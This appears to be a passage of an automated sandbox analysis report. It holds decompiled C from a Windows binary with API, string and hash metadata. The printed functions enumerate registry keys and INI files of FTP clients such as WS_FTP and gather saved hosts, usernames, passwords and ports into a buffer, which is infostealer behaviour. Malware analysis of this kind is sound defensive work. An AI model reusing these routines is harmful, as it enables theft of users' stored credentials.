                                                                    						E0040D072(_t108, _a4, _a8, _v2072);
                                                                    						E004018B8(_v2072);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t69;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040D0B9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                                    • API String ID: 1332880857-2649023343
                                                                    • Opcode ID: eb9002f98174ec3b628087ee5670cb65f30995989cf3bed41fb77dbe2e33d7e6
                                                                    • Instruction ID: 6c2faa976b9052ac72c52ca6464a050bd4b3273960fb2c20a586784dcbee0562
                                                                    • Opcode Fuzzy Hash: eb9002f98174ec3b628087ee5670cb65f30995989cf3bed41fb77dbe2e33d7e6
                                                                    • Instruction Fuzzy Hash: 6251C831840218BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9B95AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00407BBA(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				char _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				intOrPtr _v2092;
                                                                    				intOrPtr* _v2096;
                                                                    				char _v2100;
                                                                    				long _t66;
                                                                    				long _t67;
                                                                    				long _t70;
                                                                    				intOrPtr* _t82;
                                                                    
                                                                    				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t67 = _t66;
                                                                    				if(_t67 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t70 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t71 = _t70;
                                                                    						if(_t70 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t71, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t72);
                                                                    						_v2080 = E00401D71(_a8, _v2068, "Password", 0);
                                                                    						_v2072 = E00401D71(_a8, _v2068, "HostName", 0);
                                                                    						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
                                                                    						_v2088 = E00401D71(_a8, _v2068, "RemoteDirectory", 0);
                                                                    						_t82 = E00401D71( *0x414869, _v2068, "PortNumber",  &_v2084);
                                                                    						if(_t82 == 0 || _v2084 != 4) {
                                                                    							_t83 = _t82;
                                                                    							if(_t82 != 0) {
                                                                    								E004018B8(_t83);
                                                                    							}
                                                                    							_v2092 = 0x15;
                                                                    						} else {
                                                                    							 *_t28 =  *_t82;
                                                                    							E004018B8(_t82);
                                                                    						}
                                                                    						_v2096 = E00401D71(_a8, _v2068, "FSProtocol",  &_v2100);
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076), _a4, _v2080);
                                                                    							E004015CB(E00401569(_a4, _v2092), _a4, _v2088);
                                                                    							if(_v2096 == 0 || _v2100 != 4) {
                                                                    								E00401569(_a4, 0);
                                                                    							} else {
                                                                    								E00401569(_a4,  *_v2096);
                                                                    							}
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2088);
                                                                    						E004018B8(_v2096);
                                                                    						E00407BBA(_a4, _a8, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t67;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00407C01
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                    • API String ID: 1332880857-3874328862
                                                                    • Opcode ID: 5eabcfeb7fba8b38cc39ba326e16b245a28dc186406ab25f81f572592cb6073c
                                                                    • Instruction ID: 1780444ab987c72a7c0881d1e1f70479cbe17c78eae0564416758d360709c296
                                                                    • Opcode Fuzzy Hash: 5eabcfeb7fba8b38cc39ba326e16b245a28dc186406ab25f81f572592cb6073c
                                                                    • Instruction Fuzzy Hash: 7051E131900118FADF226F61CC42BED7AB9BF04344F10C5BAB548750B1DB7A6A91AF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040DC62(void* _a4, char* _a8, intOrPtr _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				char _v2088;
                                                                    				char* _v2092;
                                                                    				intOrPtr _v2096;
                                                                    				char _v2100;
                                                                    				long _t67;
                                                                    				long _t68;
                                                                    				long _t71;
                                                                    
                                                                    				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                    				_t68 = _t67;
                                                                    				if(_t68 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t71 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t72 = _t71;
                                                                    						if(_t71 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2092 = E00401DF8( &_v2064, E00401DF8(_t72, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t73);
                                                                    						_v2068 = E00401D71(_a4, _v2092, "FTP destination server", 0);
                                                                    						_v2072 = E00401D71(_a4, _v2092, "FTP destination user", 0);
                                                                    						_v2076 = E00401D71(_a4, _v2092, "FTP destination password", 0);
                                                                    						_v2080 = E00401D71(_a4, _v2092, "FTP destination port",  &_v2088);
                                                                    						_v2084 = E00401D71(_a4, _v2092, "FTP destination catalog", 0);
                                                                    						_v2096 = E00401D71(_a4, _v2092, "FTP profiles",  &_v2100);
                                                                    						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2068), _a12, _v2072), _a12, _v2076);
                                                                    							E004015CB(E0040159F(_a12, _v2080, _v2088), _a12, _v2084);
                                                                    						}
                                                                    						if(_v2100 != 0) {
                                                                    							E00401569(_a12, 0xbeef0001);
                                                                    							E0040159F(_a12, _v2096, _v2100);
                                                                    						}
                                                                    						E0040DC62(_a4, _v2092, _a12);
                                                                    						E004018B8(_v2092);
                                                                    						E004018B8(_v2068);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2084);
                                                                    						E004018B8(_v2096);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t68;
                                                                    			}



















                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040DCA9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                                                    • API String ID: 1332880857-3620412361
                                                                    • Opcode ID: 778cba59ce54c3aa10841a6e53bd8ec573bfc47db50afeda182122a8169569cd
                                                                    • Instruction ID: 9e186bede9d82e05e6d3405ca47770cfa7b4b9f889abd471e1f7745202da50bf
                                                                    • Opcode Fuzzy Hash: 778cba59ce54c3aa10841a6e53bd8ec573bfc47db50afeda182122a8169569cd
                                                                    • Instruction Fuzzy Hash: 32519671850118AADF226F61CC42FDD7ABAFF04304F1085B6B548750B1DF7A9AA5AFC8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00407F0C(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				char _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				intOrPtr _v2092;
                                                                    				intOrPtr _v2096;
                                                                    				long _t63;
                                                                    				long _t64;
                                                                    				long _t67;
                                                                    
                                                                    				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t64 = _t63;
                                                                    				if(_t64 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t67 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t68 = _t67;
                                                                    						if(_t67 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t68, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t69);
                                                                    						_v2080 = E00401D71(_a8, _v2068, "PassWord",  &_v2084);
                                                                    						_v2072 = E00401D71(_a8, _v2068, "Url", 0);
                                                                    						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
                                                                    						_v2088 = E00401D71(_a8, _v2068, "RootDirectory", 0);
                                                                    						_v2092 = E00401D71(_a8, _v2068, "Port", 0);
                                                                    						_v2096 = E00401D71(_a8, _v2068, "ServerType", 0);
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076);
                                                                    							E004015CB(E004015CB(E004015CB(E0040159F(_a4, _v2080, _v2084), _a4, _v2092), _a4, _v2088), _a4, _v2096);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2088);
                                                                    						E004018B8(_v2092);
                                                                    						E004018B8(_v2096);
                                                                    						E00407F0C(_a4, _a8, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t64;
                                                                    			}


















                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00407F53
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                                                    • API String ID: 1332880857-2128033141
                                                                    • Opcode ID: 22de75e03f9af4332dab08cffb5910af10b9bff4ca3bcc8331372a063a0d53dd
                                                                    • Instruction ID: 5ab7ce4d41d7449111e2bf0245fe8bdc2d5e3158fb84ab1408711ceaad0d48f8
                                                                    • Opcode Fuzzy Hash: 22de75e03f9af4332dab08cffb5910af10b9bff4ca3bcc8331372a063a0d53dd
                                                                    • Instruction Fuzzy Hash: C4519431840118BADF226F51CD42FED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E004026DD(char* _a4, char* _a8, int _a12) {
                                                                    				void* _v8;
                                                                    				void* _v12;
                                                                    				char _v273;
                                                                    				CHAR* _v280;
                                                                    				long _t24;
                                                                    				long _t29;
                                                                    				void* _t36;
                                                                    				long _t44;
                                                                    				void* _t47;
                                                                    				void* _t48;
                                                                    
                                                                    				_t47 = 0;
                                                                    				_t24 = RegCreateKeyA( *0x414869, "Software\\WinRAR",  &_v8); // executed
                                                                    				if(_t24 == 0) {
                                                                    					_t44 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
                                                                    					if(_t44 == 0) {
                                                                    						_t47 = 1;
                                                                    					}
                                                                    					RegCloseKey(_v8); // executed
                                                                    				}
                                                                    				_t48 = _t47;
                                                                    				if(_t48 == 0) {
                                                                    					_t29 = GetTempPathA(0x104,  &_v273);
                                                                    					if(_t29 != 0 && _t29 <= 0x104) {
                                                                    						CreateDirectoryA( &_v273, 0);
                                                                    						if(E004025A9( &_v273) != 0) {
                                                                    							_t36 = E00401DF8( &_v273,  &_v273, _a4);
                                                                    						} else {
                                                                    							_t36 = E00401E4C(E00401DF8( &_v273,  &_v273, "\\"), _t43, _a4);
                                                                    						}
                                                                    						_v280 = _t36;
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(2);
                                                                    						_push(0);
                                                                    						_push(3);
                                                                    						_push(0xc0000000);
                                                                    						ExitProcess(_v280);
                                                                    						_v12 = _t36;
                                                                    						if(_t36 + 1 != 0) {
                                                                    							_t48 = E00401422(_v12, _a8, _a12);
                                                                    							CloseHandle(_v12);
                                                                    						}
                                                                    						_t48 = _t48;
                                                                    						if(_t48 == 0) {
                                                                    							DeleteFileA(_v280);
                                                                    						}
                                                                    						E004018B8(_v280);
                                                                    					}
                                                                    				}
                                                                    				return _t48;
                                                                    			}













                                                                    APIs
                                                                    • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                                                                    • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
                                                                    • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
                                                                    • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                                                                    • String ID: Software\WinRAR
                                                                    • API String ID: 2428708885-224198155
                                                                    • Opcode ID: 9cbc2575f829246b827ea78dcd8dc99298e0788759a0ab8673f9bf8b561286c8
                                                                    • Instruction ID: 28b2972cc479343a501f6bdb5bbfbd3fa5c74dd95b9eafedc45f56a84fd52fee
                                                                    • Opcode Fuzzy Hash: 9cbc2575f829246b827ea78dcd8dc99298e0788759a0ab8673f9bf8b561286c8
                                                                    • Instruction Fuzzy Hash: 7621743194020DBBDF216FA0CD86FDD7A69AB14748F100076B214B61E1E6F99AD06B18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040504B(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				CHAR* _v276;
                                                                    				int _t24;
	void* _t25;
	void* _t26;
	long _t37;
	long _t40;
	void* _t47;
	void* _t48;
	void* _t49;

	_t49 = __edi;
	_t48 = __ecx;
	_t47 = __ebx;
	_v8 = E004015F0(_a4, 3, 0);
	_t24 = GetWindowsDirectoryA(&_v269, 0x104);
	if(_t24 != 0 && _t24 <= 0x104) {
		_v276 = E00401DF8(&_v269, &_v269, "\\win.ini");
		_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x414847, &_v269, 0x104, _v276); // executed
		if(_t37 != 0) {
			E00404E73(_t48, _a4, &_v269, 0);
		}
		_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x414847, &_v269, 0x104, _v276); // executed
		_t53 = _t40;
		if(_t40 != 0) {
			E00404E73(_t48, _a4, &_v269, 0);
		}
		E004018B8(_v276);
	}
	_t25 = E00401EB1(_t53, 0x2b); // executed
	_t26 = _t25;
	_t54 = _t26;
	if(_t26 != 0) {
		E00404E73(_t48, _a4, E00401E4C(_t26, _t26, "\\Ipswitch\\WS_FTP"), 0); // executed
		E004018B8(_t31);
	}
	E00404FFF(_t48, _t54, _a4, 0x1a, "\\Ipswitch"); // executed
	E00404FFF(_t48, _t54, _a4, 0x23, "\\Ipswitch"); // executed
	E00404FFF(_t48, _t54, _a4, 0x1c, "\\Ipswitch"); // executed
	return E00401636(_t47, _t48, _t49, _t54, _a4, _v8);
}

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
• GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414847,?,00000104,?), ref: 004050BF
• GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414847,?,00000104,?), ref: 004050FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
Yara matches
Similarity
• API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
• String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
• API String ID: 2508676433-45949541
• Opcode ID: b3e6310091d01b3e42474d4697e08130c510244b52e9dc1f677c885e0d8b0a8e
• Instruction ID: 1ad5851406937463fc4fdd25d104d768d2af762f2f9e7c483ba0ad0795fe615e
• Opcode Fuzzy Hash: b3e6310091d01b3e42474d4697e08130c510244b52e9dc1f677c885e0d8b0a8e
• Instruction Fuzzy Hash: A8212671E80608BADB127A61CC43FDE3A299B54744F100077B758B51E3DBF99BD09A6C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E0040E9F9(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
	void* _v8;
	int _v12;
	int _v16;
	char _v2064;
	intOrPtr _v2068;
	intOrPtr _v2072;
	CHAR* _v2076;
	long _t33;
	long _t38;
	CHAR* _t48;
	long _t49;

	_v2076 = E004018CF(0x105);
	_t33 = RegOpenKeyA(_a4, _a8, &_v8); // executed
	if(_t33 == 0) {
		_v12 = 0;
		while(1) {
			_v16 = 0x7ff;
			_t38 = RegEnumKeyExA(_v8, _v12, &_v2064, &_v16, 0, 0, 0, 0);
			_t39 = _t38;
			if(_t38 != 0) {
				break;
			}
			_v2068 = E00401DF8(&_v2064, E00401DF8(_t39, _a8, "\\"), &_v2064);
			E004018B8(_t40);
			_v2072 = E00401D71(_a4, _v2068, "Path", 0);
			__eflags = _v2072;
			if(__eflags != 0) {
				_t48 = E00401DF8(_t44, _v2072, "\\PocoSystem.ini");
				_push(_t48);
				_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x414847, _v2076, 0x104, _t48);
				__eflags = _t49 - 3;
				if(_t49 > 3) {
					E00404351(_a12, _v2076, "accounts.ini", 0xbeef0000);
				}
				E004018B8();
			}
			E0040E9F9(__eflags, _a4, _v2068, _a12);
			E004018B8(_v2068);
			E004018B8(_v2072);
			_v12 = _v12 + 1;
		}
		RegCloseKey(_v8);
	}
	return E004018B8(_v2076);
}

APIs
  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
• RegEnumKeyExA.ADVAPI32 ref: 0040EA50
• GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414847,?,00000104,00000000), ref: 0040EAD6
• RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
Yara matches
Similarity
• API ID: AllocCloseEnumLocalOpenPrivateProfileString
• String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
• API String ID: 1343824468-2495907966
• Opcode ID: ffbd8a854c3910af73e1b38a16e95bdd0ba29be6571c0ad4e37981ba44995c13
• Instruction ID: ac58ce0af485c97c10e38b57228944f3f3edc0c01af0d6674f8eb1bd57798e51
• Opcode Fuzzy Hash: ffbd8a854c3910af73e1b38a16e95bdd0ba29be6571c0ad4e37981ba44995c13
• Instruction Fuzzy Hash: F1314A31940118BADF11BB91CC42FDD7ABAFF04704F10C4BAB554710E1DAB99AA1AF98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004063FD(intOrPtr _a4, char* _a8) {
	void* _v8;
	int _v12;
	int _v16;
	char _v2064;
	intOrPtr _v2068;
	intOrPtr _v2072;
	intOrPtr _v2076;
	intOrPtr _v2080;
	intOrPtr _v2084;
	intOrPtr _v2088;
	intOrPtr* _v2092;
	char _v2096;
	char _v2100;
	long _t57;
	long _t58;
	long _t61;
	intOrPtr* _t72;

	_t57 = RegOpenKeyA(*0x414869, _a8, &_v8); // executed
	_t58 = _t57;
	if(_t58 == 0) {
		_v12 = 0;
		while(1) {
			_v16 = 0x7ff;
			_t61 = RegEnumKeyExA(_v8, _v12, &_v2064, &_v16, 0, 0, 0, 0);
			_t62 = _t61;
			if(_t61 != 0) {
				break;
			}
			_v2068 = E00401E4C(&_v2064, E00401DF8(_t62, _a8, "\\"), &_v2064);
			_v2080 = E00401D71(*0x414869, _v2068, "PW", 0);
			_v2072 = E00401D71(*0x414869, _v2068, "Host", 0);
			_v2076 = E00401D71(*0x414869, _v2068, "User", 0);
			_v2084 = E00401D71(*0x414869, _v2068, "PthR", 0);
			_t72 = E00401D71(*0x414869, _v2068, "Port", &_v2096);
			if(_t72 == 0 || _v2096 != 4) {
				_t73 = _t72;
				if(_t72 != 0) {
					E004018B8(_t73);
				}
				_v2088 = 0x15;
			} else {
				*_t23 = *_t72;
				E004018B8(_t72);
			}
			_v2092 = E00401D71(*0x414869, _v2068, "SSH", &_v2100);
			if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
				E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076), _a4, _v2080);
				E004015CB(E00401569(_a4, _v2088), _a4, _v2084);
				if(_v2092 == 0 || _v2100 != 4) {
					E00401569(_a4, 0);
				} else {
					E00401569(_a4, *_v2092);
				}
			}
			E004018B8(_v2080);
			E004018B8(_v2072);
			E004018B8(_v2076);
			E004018B8(_v2084);
			E004018B8(_v2092);
			E004018B8(_v2068);
			_v12 = _v12 + 1;
		}
		return RegCloseKey(_v8);
	}
	return _t58;
}

APIs
• RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
• RegEnumKeyExA.ADVAPI32 ref: 00406447
• RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
Strings
Memory Dump Source
• Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: Host$Port$PthR$SSH$User
• API String ID: 1332880857-1643752846
• Opcode ID: deb2347e482cfc6ac4c13a4373beb61988f4ed264ac067ee08bdaaf07eff2da2
• Instruction ID: 7c2f2a94b444b1cf8be7c0a3922bf6908aa52d237082ff0e2c71ec8c1971a0d3
• Opcode Fuzzy Hash: deb2347e482cfc6ac4c13a4373beb61988f4ed264ac067ee08bdaaf07eff2da2
• Instruction Fuzzy Hash: 5751E43194011CFADF22AB51CC42BED7AB9BF44304F10C5BAB549750F1CB7A5AA1AF88
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405F4C(intOrPtr _a4, char* _a8) {
	void* _v8;
	int _v12;
	int _v16;
	char _v2064;
	intOrPtr _v2068;
	intOrPtr _v2072;
	intOrPtr _v2076;
	intOrPtr _v2080;
	intOrPtr _v2084;
	intOrPtr _v2088;
	char _v2092;
	long _t48;
	long _t49;
	long _t52;
	intOrPtr* _t64;

	_t48 = RegOpenKeyA(*0x414869, _a8, &_v8); // executed
	_t49 = _t48;
	if(_t49 == 0) {
		_v12 = 0;
		while(1) {
			_v16 = 0x7ff;
			_t52 = RegEnumKeyExA(_v8, _v12, &_v2064, &_v16, 0, 0, 0, 0);
			_t53 = _t52;
			if(_t52 != 0) {
				break;
			}
			_v2068 = E00401DF8(&_v2064, E00401DF8(_t53, _a8, "\\"), &_v2064);
			E004018B8(_t54);
			_v2080 = E00401D71(*0x414869, _v2068, "Password", 0);
			_v2072 = E00401D71(*0x414869, _v2068, "HostAdrs", 0);
			_v2076 = E00401D71(*0x414869, _v2068, "UserName", 0);
			_v2084 = E00401D71(*0x414869, _v2068, "RemoteDir", 0);
			_t64 = E00401D71(*0x414869, _v2068, "Port", &_v2092);
			if(_t64 == 0 || _v2092 != 4) {
				_t65 = _t64;
				if(_t64 != 0) {
                                                                    								E004018B8(_t65);
                                                                    							}
                                                                    							_v2088 = 0x15;
                                                                    						} else {
                                                                    							 *_t23 =  *_t64;
                                                                    							E004018B8(_t64);
                                                                    						}
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084);
                                                                    							E00401569(_a4, _v2088);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2084);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t49;
                                                                     			}
                                                                    0x00405f62
                                                                    0x00405f67
